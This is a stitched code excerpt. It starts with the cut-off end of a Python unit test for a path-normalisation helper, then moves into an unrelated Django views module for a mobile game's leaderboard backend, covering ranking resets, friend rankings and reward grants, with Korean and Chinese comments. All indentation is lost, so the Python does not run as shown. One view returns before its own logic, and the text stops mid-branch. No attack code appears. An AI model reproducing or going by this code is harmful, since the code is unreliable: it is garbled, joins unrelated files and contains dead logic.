source_map, source_min))
def test_find_double_parent(self):
base = tempfile.mktemp()
root = join(base, 'file.js')
nested = join(base, 'src', 'dir', 'blahfile.js')
self.assertEqual([pardir, pardir, 'file.js'], utils.normrelpath(
nested, root).split(sep))
self.assertEqual(['src', 'dir', 'blahfile.js'], utils.normrelpath(
root, nested).split(sep))
def test_find_same_prefix(self):
base = tempfile.mktemp()
src = join(base, 'basesrc', 'source.js')
tgt = join(base, 'basetgt', 'target.js')
self.assertEqual([pardir, 'basetgt', 'target.js'], utils.normrelpath(
src, tgt).split(sep))
def test_relative_dirs_ignored(self):
base = tempfile.mktemp()
absolute = join(base, 'file.js')
relative = join('somedir', 'file.js')
self.assertEqual(relative, utils.normrelpath(absolute, relative))
self.assertEqual(absolute, utils.normrelpath(relative, absolute))
|
# -*- coding: utf-8 -*-
# Create your views here.
from django.views.decorators.csrf import csrf_exempt
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse
from Ranking.models import *
from ShopData.models import *
from users.models import UserData
from users.models import FriendData
from GameData.models import MoneyData
from GameData.models import ItemData
from MessageData.models import TokenReceiveData
from datetime import datetime, timedelta
from django.db.models import Q
import myUtil
# 排名初始化检查.
"""
호출 값
"""
@csrf_exempt
def InitRankCheck(request):
return HttpResponse('', content_type='application/json')
# 处理结果
# 朋友每周排名.
rankdata = list(RankInfoData.objects.filter(FriendInitTime__lt = datetime.today())[0:1])
if len(rankdata) > 0:
rankdata = rankdata[0]
# # 无穷远模式.
# InfiniteWeekList = list(InfiniteFriendWeekRankData.objects.order_by('-Score'))
# InfiniteFriendLastWeekRankData.objects.all().delete()
# cnt = 1
# for data in InfiniteWeekList:
# rank = InfiniteFriendLastWeekRankData()
# rank.UserSN = data.UserSN
# rank.Score = data.Score
# rank.Confirm = False
# rank.save()
# cnt = cnt + 1
# InfiniteFriendWeekRankData.objects.all().update(Score = 0)
# # 타임어택.
# TimeAttackWeekList = list(TimeAttackFriendWeekRankData.objects.order_by('-Score'))
# TimeAttackFriendLastWeekRankData.objects.all().delete()
# cnt = 1
# for data in TimeAttackWeekList:
# rank = TimeAttackFriendLastWeekRankData()
# rank.UserSN = data.UserSN
# rank.Score = data.Score
# rank.Confirm = False
# rank.save()
# cnt = cnt + 1
# TimeAttackFriendWeekRankData.objects.all().update(Score = 0)
rankdata.FriendInitTime = rankdata.FriendInitTime + timedelta(days=7)
rankdata.save()
# 주간랭킹.
rankdata = list(RankInfoData.objects.filter(WeekInitTime__lt = datetime.today())[0:1])
if len(rankdata) > 0:
rankdata = rankdata[0]
# 무한모드.
InfiniteWeekList = list(InfiniteWeekRankData.objects.order_by('-Score'))
InfiniteLastWeekRankData.objects.all().delete()
cnt = 1
for data in InfiniteWeekList:
rank = InfiniteLastWeekRankData()
rank.UserSN = data.UserSN
rank.Score = data.Score
rank.Confirm = False
rank.save()
cnt = cnt + 1
InfiniteWeekRankData.objects.all().update(Score = 0)
# 타임어택.
TimeAttackWeekList = list(TimeAttackWeekRankData.objects.order_by('-Score'))
TimeAttackLastWeekRankData.objects.all().delete()
cnt = 1
for data in TimeAttackWeekList:
rank = TimeAttackLastWeekRankData()
rank.UserSN = data.UserSN
rank.Score = data.Score
rank.Confirm = False
rank.save()
cnt = cnt + 1
TimeAttackWeekRankData.objects.all().update(Score = 0)
rankdata.WeekInitTime = rankdata.WeekInitTime + timedelta(days=7)
rankdata.save()
# 월간랭킹.
rankdata = list(RankInfoData.objects.filter(MonthInitTime__lt = datetime.today())[0:1])
if len(rankdata) > 0:
rankdata = rankdata[0]
# 무한모드.
InfiniteMonthList = list(InfiniteMonthRankData.objects.order_by('-Score'))
InfiniteLastMonthRankData.objects.all().delete()
cnt = 1
for data in InfiniteMonthList:
rank = InfiniteLastMonthRankData()
rank.UserSN = data.UserSN
rank.Score = data.Score
rank.Confirm = False
rank.save()
cnt = cnt + 1
InfiniteMonthRankData.objects.all().update(Score = 0)
# 타임어택.
TimeAttackMonthList = list(TimeAttackMonthRankData.objects.order_by('-Score'))
TimeAttackLastMonthRankData.objects.all().delete()
cnt = 1
for data in TimeAttackMonthList:
rank = TimeAttackLastMonthRankData()
rank.UserSN = data.UserSN
rank.Score = data.Score
rank.Confirm = False
rank.save()
cnt = cnt + 1
TimeAttackMonthRankData.objects.all().update(Score = 0)
year = rankdata.MonthInitTime.year
month = rankdata.MonthInitTime.month
if rankdata.MonthInitTime.month == 12:
year = year + 1
month = 1
else:
month = month + 1
rankdata.MonthInitTime = datetime(year, month, 1, rankdata.MonthInitTime.hour, rankdata.MonthInitTime.minute, rankdata.MonthInitTime.second)
rankdata.save()
return HttpResponse('', content_type='application/json')
#
#-------------------------------------------------------------------------------
# 전적정보 가져오기.
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
# 무한모드 랭킹 1등 횟수.
InfiniteModeRank_1
# 무한모드 랭킹 2등 횟수.
InfiniteModeRank_2
# 무한모드 랭킹 3등 횟수.
InfiniteModeRank_3
# 타임어택 랭킹 1등 횟수.
TimeAttackModeRank_1
# 타임어택 랭킹 2등 횟수.
TimeAttackModeRank_2
# 타임어택 랭킹 3등 횟수.
TimeAttackModeRank_3
"""
@csrf_exempt
def BestRecodDataResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
dataList = list(BestRecodData.objects.filter(UserSN = request.POST.get('SN')))
if len(dataList) == 0:
return HttpResponse('', content_type='application/json')
record = dataList[0]
SendData = {}
SendData['InfiniteModeRank_1'] = record.InfiniteModeRank_1
SendData['InfiniteModeRank_2'] = record.InfiniteModeRank_2
SendData['InfiniteModeRank_3'] = record.InfiniteModeRank_3
SendData['TimeAttackModeRank_1'] = record.TimeAttackModeRank_1
SendData['TimeAttackModeRank_2'] = record.TimeAttackModeRank_2
SendData['TimeAttackModeRank_3'] = record.TimeAttackModeRank_3
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 친구 주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
data['IsReceive'] = True
data['ReceiveTime'] = 0
임시추가..
data['UserName'] = 유저이름.
data['PictureURL'] = 유저 사진url
"""
@csrf_exempt
def FriendInfiniteWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('S_No'):
data = {
'ErrorCode' : '102',
'Message' : 'S_No does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('E_No'):
data = {
'ErrorCode' : '102',
'Message' : 'E_No does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
friendList = []
friendRankList = []
for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
friendList.append(friendData.FriendSN)
min = int(request.POST.get('S_No'))
max = int(request.POST.get('E_No'))
cnt = min
for rankData in list(InfiniteFriendWeekRankData.objects.order_by('-Score')[min : max]):
if rankData.UserSN in friendList or rankData.UserSN == int(request.POST.get('SN')):
tokenReceive = list(TokenReceiveData.objects.filter(UserSN = rankData.UserSN, SendUserSN = rankData.UserSN))
userData = list(UserData.objects.filter(id = rankData.UserSN))
cnt = cnt + 1
data = {}
data['UserSN'] = rankData.UserSN
data['Rank'] = cnt
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['Pet1SN'] = rankData.Pet1SN
data['Pet2SN'] = rankData.Pet2SN
data['VehicleSN'] = rankData.VehicleSN
if len(tokenReceive) > 0:
data['IsReceive'] = tokenReceive[0].IsReceive
data['ReceiveTime'] = myUtil.ToSecRemaining(tokenReceive[0].ReceiveTime)
else:
data['IsReceive'] = True
data['ReceiveTime'] = 0
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
friendRankList.append(data)
return HttpResponse(myUtil.JsonPaser(friendRankList), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 친구 주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
임시추가..
data['UserName'] = 유저이름.
data['PictureURL'] = 유저 사진url
"""
@csrf_exempt
def FriendTimeAttackWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('S_No'):
data = {
'ErrorCode' : '102',
'Message' : 'S_No does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('E_No'):
data = {
'ErrorCode' : '102',
'Message' : 'E_No does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
friendList = []
friendRankList = []
for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
friendList.append(friendData.FriendSN)
min = int(request.POST.get('S_No'))
max = int(request.POST.get('E_No'))
cnt = min
for rankData in list(TimeAttackFriendWeekRankData.objects.order_by('-Score')[min : max]):
if rankData.UserSN in friendList or str(rankData.UserSN) == request.POST.get('SN'):
tokenReceive = list(TokenReceiveData.objects.filter(UserSN = rankData.UserSN, SendUserSN = rankData.UserSN))
userData = list(UserData.objects.filter(id = rankData.UserSN))
cnt = cnt + 1
data = {}
data['UserSN'] = rankData.UserSN
data['Rank'] = cnt
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['Pet1SN'] = rankData.Pet1SN
data['Pet2SN'] = rankData.Pet2SN
data['VehicleSN'] = rankData.VehicleSN
if len(tokenReceive) > 0:
data['IsReceive'] = tokenReceive[0].IsReceive
data['ReceiveTime'] = myUtil.ToSecRemaining(tokenReceive[0].ReceiveTime)
else:
data['IsReceive'] = True
data['ReceiveTime'] = 0
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
friendRankList.append(data)
return HttpResponse(myUtil.JsonPaser(friendRankList), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
MyRank = 내랭킹 데이터.
RankData = 랭킹데이터..
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
임시추가..
data['UserName'] = 유저이름.
data['PictureURL'] = 유저 사진url
"""
@csrf_exempt
def InfiniteWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('S_No'):
data = {
'ErrorCode' : '102',
'Message' : 'S_No does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('E_No'):
data = {
'ErrorCode' : '102',
'Message' : 'E_No does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
SendData = {}
RankList = []
# min = int(request.POST.get('S_No'))
# max = int(request.POST.get('E_No'))
min = 0
max = 30
cnt = min
myRank = 0
for rankData in list(InfiniteWeekRankData.objects.filter(
(Q(Score__gt = 0) | Q(UserSN = user.id)) & Q(Score__lt = 1000000)
).order_by('-Score')[min : max]):
userData = list(UserData.objects.filter(id = rankData.UserSN))
cnt = cnt + 1
data = {}
data['UserSN'] = rankData.UserSN
data['Rank'] = cnt
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['Pet1SN'] = rankData.Pet1SN
data['Pet2SN'] = rankData.Pet2SN
data['VehicleSN'] = rankData.VehicleSN
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
else:
continue
RankList.append(data)
if rankData.UserSN == int(request.POST.get('SN')):
SendData['MyRank'] = data
myRank = cnt
SendData['RankData'] = RankList
SendData['MyPercent'] = int(myRank / cnt * 100)
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
"""
@csrf_exempt
def TimeAttackWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
SendData = {}
RankList = []
min = int(request.POST.get('S_No'))
max = int(request.POST.get('E_No'))
cnt = min
myRank = 0
for rankData in list(TimeAttackWeekRankData.objects.order_by('-Score')[min : max]):
userData = list(UserData.objects.filter(id = rankData.UserSN))
cnt = cnt + 1
data = {}
data['UserSN'] = rankData.UserSN
data['Rank'] = cnt
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['Pet1SN'] = rankData.Pet1SN
data['Pet2SN'] = rankData.Pet2SN
data['VehicleSN'] = rankData.VehicleSN
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
RankList.append(data)
if rankData.UserSN == int(request.POST.get('SN')):
SendData['MyRank'] = data
myRank = cnt
SendData['RankData'] = RankList
SendData['MyPercent'] = int(myRank / cnt * 100)
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
"""
@csrf_exempt
def InfiniteMonthRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
SendData = {}
RankList = []
min = int(request.POST.get('S_No'))
max = int(request.POST.get('E_No'))
min = 0
max = 30
cnt = min
myRank = 0
for rankData in list(InfiniteMonthRankData.objects.filter(
(Q(Score__gt = 0) | Q(UserSN = user.id)) & Q(Score__lt = 1000000)
).order_by('-Score')[min : max]):
userData = list(UserData.objects.filter(id = rankData.UserSN))
cnt = cnt + 1
data = {}
data['UserSN'] = rankData.UserSN
data['Rank'] = cnt
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['Pet1SN'] = rankData.Pet1SN
data['Pet2SN'] = rankData.Pet2SN
data['VehicleSN'] = rankData.VehicleSN
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
else:
continue
RankList.append(data)
if rankData.UserSN == int(request.POST.get('SN')):
SendData['MyRank'] = data
myRank = cnt
SendData['RankData'] = RankList
SendData['MyPercent'] = int(myRank / cnt * 100)
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 월간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
S_No = 시작위치.
E_No = 끝위치.
리턴값
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['PetSN'] = rankData.PetSN
data['VehicleSN'] = rankData.VehicleSN
"""
@csrf_exempt
def TimeAttackMonthRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
SendData = {}
RankList = []
min = int(request.POST.get('S_No'))
max = int(request.POST.get('E_No'))
cnt = min
myRank = 0
for rankData in list(TimeAttackMonthRankData.objects.order_by('-Score')[min : max]):
userData = list(UserData.objects.filter(id = rankData.UserSN))
cnt = cnt + 1
data = {}
data['UserSN'] = rankData.UserSN
data['Rank'] = cnt
data['Score'] = rankData.Score
data['CharacterSN'] = rankData.CharacterSN
data['Pet1SN'] = rankData.Pet1SN
data['Pet2SN'] = rankData.Pet2SN
data['VehicleSN'] = rankData.VehicleSN
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
RankList.append(data)
if rankData.UserSN == int(request.POST.get('SN')):
SendData['MyRank'] = data
myRank = cnt
SendData['RankData'] = RankList
SendData['MyPercent'] = int(myRank / cnt * 100)
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 무한모드 친구 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
MyRank = 내랭킹
RewardData
- Type = 1 : 골드, 2 : 캐쉬, 3 : 아이템.
- ItemSN = 아이템SN.
- Value = 수량.
RankData
- UserSN = 유저 번호.
- Rank = 랭킹.
- Score = 점수.
- UserName = 유저 이름.
- PictureURL = 사진URL.
"""
@csrf_exempt
def FriendInfiniteLastWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
# 랭킹확인여부.
confirmData = list(InfiniteFriendLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) == 0 or confirmData[0].Confirm == True:
return HttpResponse('', content_type='application/json')
confirmData[0].Confirm = True
confirmData[0].save()
friendList = []
friendRankList = []
SendData = {}
RewardData = []
RewardList = []
for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
friendList.append(friendData.FriendSN)
cnt = 1
for rankData in list(InfiniteFriendLastWeekRankData.objects.order_by('-Score')):
if rankData.UserSN in friendList or rankData.UserSN == int(request.POST.get('SN')):
userData = list(UserData.objects.filter(id = rankData.UserSN))
data = {}
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['Rank'] = cnt
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
friendRankList.append(data)
if rankData.Score > 0:
# 보상처리.
if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
SendData['MyRank'] = cnt
RewardList = list(FriendRankNo1Reward.objects.all())
elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
SendData['MyRank'] = cnt
RewardList = list(FriendRankNo2Reward.objects.all())
elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
SendData['MyRank'] = cnt
RewardList = list(FriendRankNo3Reward.objects.all())
else:
RewardList = []
cnt = cnt + 1
for reward in RewardList:
data = {}
if reward.Type == 1:
UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
if len(UserList) > 0:
money = UserList[0]
money.GoldValue = money.GoldValue + reward.Value
money.save()
data['Type'] = reward.Type
data['ItemSN'] = reward.ItemSN
data['Value'] = reward.Value
elif reward.Type == 2:
UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
if len(UserList) > 0:
money = UserList[0]
money.CashValue = money.CashValue + reward.Value
money.save()
data['Type'] = reward.Type
data['ItemSN'] = reward.ItemSN
data['Value'] = reward.Value
elif reward.Type == 3:
myItem = list(ItemData.objects.filter(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN))
if len(myItem) > 0:
myItem[0].Value = myItem[0].Value + reward.Value
myItem[0].save()
else:
itemdata = ItemData(UserSN = request.POST.get('SN'), ItemSN = reward.ItemSN, Value = reward.Value)
itemdata.save()
data['Type'] = reward.Type
data['ItemSN'] = reward.ItemSN
data['Value'] = reward.Value
RewardData.append(data)
SendData['RankData'] = friendRankList
SendData['RewardData'] = RewardData
return HttpResponse(myUtil.JsonPaser(SendData), content_type='application/json')
#-------------------------------------------------------------------------------
# 타임어택 친구 전주간랭킹
"""
호출 값
SN = 유저SN.
Auth = 인증 토큰.
리턴값
MyRank = 내랭킹
RewardData
- Type = 1 : 골드, 2 : 캐쉬, 3 : 아이템.
- ItemSN = 아이템SN.
- Value = 수량.
RankData
- UserSN = 유저 번호.
- Rank = 랭킹.
- Score = 점수.
- UserName = 유저 이름.
- PictureURL = 사진URL.
"""
@csrf_exempt
def FriendTimeAttackLastWeekRankResponse(request):
# 호출인자 검사.
if request.method == 'GET':
data = {
'ErrorCode' : '99',
'Message' : 'error',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
if not request.POST.get('SN'):
data = {
'ErrorCode' : '101',
'Message' : 'SN does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
elif not request.POST.get('Auth'):
data = {
'ErrorCode' : '102',
'Message' : 'Auth does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = list(UserData.objects.filter(id = request.POST.get('SN')))
if len(user) == 0:
data = {
'ErrorCode' : '103',
'Message' : 'UserData does not exist',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
user = user[0]
if user.Auth != request.POST.get('Auth'):
data = {
'ErrorCode' : '104',
'Message' : 'Auth is invalid.',
}
return HttpResponse(myUtil.JsonPaser(data), content_type='application/json')
# 결과 처리.
# 랭킹확인여부.
confirmData = list(TimeAttackFriendLastWeekRankData.objects.filter(UserSN = request.POST.get('SN')))
if len(confirmData) == 0 or confirmData[0].Confirm == True:
return HttpResponse('', content_type='application/json')
confirmData[0].Confirm = True
confirmData[0].save()
friendList = []
friendRankList = []
SendData = {}
RewardData = []
RewardList = []
for friendData in list(FriendData.objects.filter(UserSN = request.POST.get('SN'))):
friendList.append(friendData.FriendSN)
cnt = 1
for rankData in list(TimeAttackFriendLastWeekRankData.objects.order_by('-Score')):
if rankData.UserSN in friendList or rankData.UserSN == int(request.POST.get('SN')):
userData = list(UserData.objects.filter(id = rankData.UserSN))
data = {}
data['UserSN'] = rankData.UserSN
data['Score'] = rankData.Score
data['Rank'] = cnt
if len(userData) > 0:
data['UserName'] = myUtil.encodeStr(userData[0].UserName)
data['PictureURL'] = userData[0].PictureURL
friendRankList.append(data)
if rankData.Score > 0:
# 보상처리.
if cnt == 1 and int(request.POST.get('SN')) == rankData.UserSN:
SendData['MyRank'] = cnt
RewardList = list(FriendRankNo1Reward.objects.all())
elif cnt == 2 and int(request.POST.get('SN')) == rankData.UserSN:
SendData['MyRank'] = cnt
RewardList = list(FriendRankNo2Reward.objects.all())
elif cnt == 3 and int(request.POST.get('SN')) == rankData.UserSN:
SendData['MyRank'] = cnt
RewardList = list(FriendRankNo3Reward.objects.all())
else:
RewardList = []
cnt = cnt + 1
for reward in RewardList:
data = {}
if reward.Type == 1:
UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
if len(UserList) > 0:
money = UserList[0]
money.GoldValue = money.GoldValue + reward.Value
money.save()
data['Type'] = reward.Type
data['ItemSN'] = reward.ItemSN
data['Value'] = reward.Value
elif reward.Type == 2:
UserList = list(MoneyData.objects.filter(UserSN = request.POST.get('SN')))
if len(UserList) > 0:
money = UserList[0]
money.CashValue = money.CashValue + reward.Value
money.save()
data['Type'] = reward.Type
data['ItemSN'] = reward.ItemSN
data['Value'] = reward.Value
elif reward.Type == 3:
